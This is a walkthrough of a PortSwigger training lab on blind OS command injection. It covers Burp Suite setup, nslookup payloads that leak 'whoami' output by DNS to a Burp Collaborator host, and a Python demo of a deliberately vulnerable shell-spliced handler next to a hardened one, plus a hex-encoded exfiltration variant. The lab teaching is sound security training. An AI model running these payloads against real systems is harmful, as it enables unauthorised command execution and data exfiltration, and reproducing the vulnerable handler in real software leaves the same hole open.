Lab 5 - Blind OS Command Injection with Out-of-Band Data Exfiltration
Lab 5: Setup
Burp Suite Startup
Disclaimer: This lab needs Burp Suite Professional (Burp Collaborator is not included in the Community edition), which I don't have, so part of the lab is taken from this video: https://www.youtube.com/watch?v=v_UVXSTkSfA
- Open Burp Suite: click the Kali Linux icon in the top-left corner to expand the menu, then type "Burp Suite" in the search bar.
- Click on "OK".
- Click on "I Accept".
- Click on "Next".
- Click on "Start Burp".
Intercept Requests Using Burp Proxy
- Once Burp Suite has finished loading, click on "Proxy".
- Click on "Open browser".
Navigate to the Command Injection Labs on PortSwigger in the Burp Suite Browser
- Log in to the [PortSwigger](https://portswigger.net/) website.
- Click on the three lines under "MY ACCOUNT" on the PortSwigger website, then click on "Academy".
- Click on the expand button, then click on "Latest topics" and "View all topics".
- Scroll down and click on "Command Injection".
- Scroll down and click on the lab "Blind OS command injection with out-of-band data exfiltration".
- Click on "ACCESS THE LAB".
Lab Description:
This lab contains a blind OS command injection vulnerability in the feedback function.
The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application's response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.
To solve the lab, execute the "whoami" command and exfiltrate the output via a DNS query to Burp Collaborator. You will need to enter the name of the current user to complete the lab.
Lab Solution
This lab is basically Lab 4 with the "whoami" command added, so we pick up where we left off in Lab 4: the feedback request is in Repeater and a Collaborator hostname has been generated in the Burp Collaborator client (the `zorh37...burpcollaborator.net` hostname below is the one from this run; every Collaborator payload is unique, so yours will differ).
- Instead of using:
```
& nslookup zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #
```
- Add the "whoami" command as the leftmost label of the Collaborator hostname, using backtick command substitution:
```
& nslookup `whoami`.zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #
```
Or
- Use `$(...)` command substitution, which does the same thing:
```
& nslookup $(whoami).zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #
```
There must be no space between the closing backtick (or parenthesis) and the dot: the shell replaces the substitution with the command's output in place, so `nslookup` resolves `<username>.zorh37...burpcollaborator.net` and the username reaches Collaborator as a DNS label. The leading `&` terminates the application's own command so the injected one runs regardless of it, and the trailing `#` comments out whatever the application appends after the injected value.
- Remember to highlight the command in Repeater and press "Ctrl + U" to URL-encode it; sent raw, the `&` would be read as a form-field separator and the space and `#` would not reliably reach the shell.
- Navigate to the "Burp Collaborator client" tab and click on "Poll now".
- Two new DNS interactions appear, and their hostname starts with "peter-tZXgy0": that is the output of `whoami` (the suffix after "peter-" is randomised per lab instance). Enter that username in the lab banner to solve it.
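As an added example that is not part of the original writeup or of PortSwigger's lab code, the script below simulates the feedback handler in Python: a vulnerable version that splices the submitted e-mail into a shell string, a hardened version that passes an argv list and never invokes a shell, the out-of-band payload from the solution above (with `echo` standing in for `nslookup` so the "DNS name" is visible without network access), the URL-encoding that Ctrl+U performs, and a hex-encoded variant for usernames that would not be valid DNS labels. The handler's command (`printf`), the placeholder Collaborator hostname `example-id.oastify.com` and all sample values are assumptions for the demo, not the lab's real implementation.

```python
import re
import subprocess
import urllib.parse
from typing import Optional

# Placeholder Collaborator hostname (assumption): use the one your
# Burp Collaborator client generates.
COLLAB = "example-id.oastify.com"


def vulnerable_feedback(email: str) -> str:
    """Mirrors the lab's bug: the submitted value is spliced into a shell
    string. A real handler would call something like sendmail and discard
    the output; printf stands in here and stdout is captured only so the
    demo can show what the shell actually ran (the lab is blind)."""
    cmd = f"printf 'feedback from %s\\n' {email}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_feedback(email: str) -> str:
    """Fix: no shell at all. Each argv element is passed verbatim, so '&',
    '`', '$(' and '#' are just characters inside one argument."""
    return subprocess.run(
        ["printf", "feedback from %s\n", email], capture_output=True, text=True
    ).stdout


def oob_payload(collab: str, sink: str = "nslookup", style: str = "backtick") -> str:
    """The lab payload: '&' terminates the application's command, the command
    substitution becomes the leftmost DNS label, '#' comments out whatever
    the application appends after the injection point."""
    sub = "`whoami`" if style == "backtick" else "$(whoami)"
    return f"& {sink} {sub}.{collab} #"


def hex_oob_payload(collab: str, sink: str = "nslookup") -> str:
    """Variant for output that is not a valid DNS label (spaces, '_', more
    than 63 characters): strip the newline, hex-encode with od, and send
    only [0-9a-f]. Decode with decode_hex_label()."""
    return f"& {sink} $(whoami | tr -d '\\n' | od -An -tx1 | tr -d ' \\n').{collab} #"


def burp_url_encode(payload: str) -> str:
    """What Ctrl+U ('URL-encode key characters') achieves for this payload:
    '&', '#', space and the backticks must not reach the server as raw
    form-encoding metacharacters. quote() encodes every reserved byte, a
    superset of what Burp encodes, which the server decodes identically."""
    return urllib.parse.quote(payload, safe="")


def form_body(email_payload: str, **other_fields: str) -> str:
    """Full application/x-www-form-urlencoded body as Repeater would send it."""
    return urllib.parse.urlencode({**other_fields, "email": email_payload})


def leaked_label(text: str, collab: str) -> Optional[str]:
    """Pull the leftmost label out of the exfiltration hostname, whether it
    appears in the demo's stdout or in a Collaborator DNS interaction."""
    m = re.search(r"([A-Za-z0-9_-]+)\." + re.escape(collab), text)
    return m.group(1) if m else None


def decode_hex_label(label: str) -> str:
    return bytes.fromhex(label).decode()


def current_user() -> str:
    """Ground truth for the demo: what the injected whoami should report."""
    return subprocess.run(["whoami"], capture_output=True, text=True).stdout.strip()


if __name__ == "__main__":
    payload = oob_payload(COLLAB, sink="echo")
    print("payload       :", payload)
    print("Ctrl+U encoded:", burp_url_encode(payload))
    print("form body     :", form_body(payload, name="x", subject="x", message="x"))
    out = vulnerable_feedback(payload)
    print("vulnerable ran:", out)
    print("leaked user   :", leaked_label(out, COLLAB))
    print("hardened ran  :", hardened_feedback(payload))
```

Running it shows the vulnerable handler emitting `<user>.example-id.oastify.com` (the line `nslookup` would have resolved), while the hardened handler prints the payload back as inert text. The hex variant goes beyond the lab's own payload: it is only needed when the leaked value contains characters DNS labels cannot carry.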